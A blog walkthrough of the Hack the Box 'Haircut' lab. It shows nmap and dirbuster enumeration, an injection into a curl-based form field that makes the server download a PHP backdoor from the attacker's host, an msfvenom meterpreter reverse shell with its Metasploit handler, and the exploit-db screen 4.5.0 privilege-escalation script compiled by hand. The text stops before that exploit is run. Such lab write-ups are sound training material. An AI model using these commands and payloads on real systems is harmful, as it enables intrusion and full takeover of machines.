Hacking Articles|Raj Chandel's Blog: Hack the Box Challenge: Haircut Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Haircut” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of WAPT. Let start and learn how to analysis any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Haircut is 10.10.10.124 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 24

From given below image, you can observe we found port 22 and 80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser and following image as shown below.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://10.10.10.24 for php file extension.

As a result it found uploads directory with 403 response and an exposed.php file with 200 ok response.

When we explored http://10.10.10.24/exposed.php we found a search page for finding location of any hairdresser’s.

For testing I search for google.com and received very uncommon result but when I inspect the following code I notice word “CURL” which might be pointing towards running curl service in targets system. As we known curl have upload or download option and hence here we can transfer our backdoor in targets system.

Without wasting time I generated a php backdoor with help of msfvenom and start multi/handler inside metasploit framework.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 -f raw

Now we need to transfer our backdoor file to target system therefore first we need to run python server on port 80 using following command.

python -m SimpleHTTPServer 80

First I tryied to upload file directly through browser http://10.10.10.24/exposed.php but got failed at that point I use burpsuite for fetching HTTP post request and send it to repeater. Then I run curl command for downloading any file from given path by omitting word “curl” as shown below.

formurl = -o uploads/revshell.php http://10.10.14.3/revshell.php

uploads/revshell.php denotes the path where our backdoor reverse.php file will be uploaded.

http://10.10.14.3/revshell.php denotes the path for downloading file from here.

After then click on Go tab and found that our file is successfully transfer into target’s system.

As revshell.php file is successfully transfer into target’s system but we need to execute that file for getting reverse connection therefore I simply run following path in web browser.

URL: http://10.10.10.24/uploads/revshell.php

After executing uploaded backdoor file come back to metsploit framework and wait for meterpreter session.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.3

msf exploit(multi/handler) set lport 4321

msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

meterpreter>sysinfo

Now let’s finished the task by grabbing user.txt and root.txt file. First I move into home directory and check available files and directories inside it.

cd home

here I got a directory maria and after exploring it we found so many files and directory, at last I fetch user.txt file from inside /maria/Desktop/ and use cat command for reading.

cat user.txt

our 1^st challenges finished successfully now move for 2^nd challenge.

For spawning proper tty shell of target’s system we need to import python file therefore I run following command inside meterpreter shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Then using following command we got all files and directories having root permission.

find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null

Here I notice /usr/bin/screen-4.5.0 now let’s check its exploit if available.

In a new terminal we look for any exploit present in exploitdb for screen 4.5.0 with help of searchsploit.

searchsploit screen 4.5.0

From given below image you can observe the highlighted exploit 41154.sh which is shell script for local privilege escalation.

When I didn’t find any appropriate method to execute this shell script for post exploitation then I go with manual compilation and review its code using cat command.

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

If you will notice following code then you will observe this script is written in C language and we have divided it into three part for manual compilation.

· Copy Yellow highlighted code and past it in a text document and save it as libhax.c

· Copy Orange highlighted code and past it in a text document and save it as rootshell.c

· At last copy remaining code and past it in a text document and save it as 41154.sh

From given below image you can see I have paste above copied inside rootshell.c

From given below image you can see I have paste above copied inside libhax.c

From given below image you can see I have paste above remaining copied inside 41154.sh and save all three text document on the desktop in a new folder shell.

Let’s compile our C program file manually in our local system using gcc as given below.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

Similarly compile rootshell.c file through following command.

gcc -o rootshell rootshell.c

From given below image you can see all files we have stored in our folder shell, now let’s upload them into target’s system through our previous meterpreter session.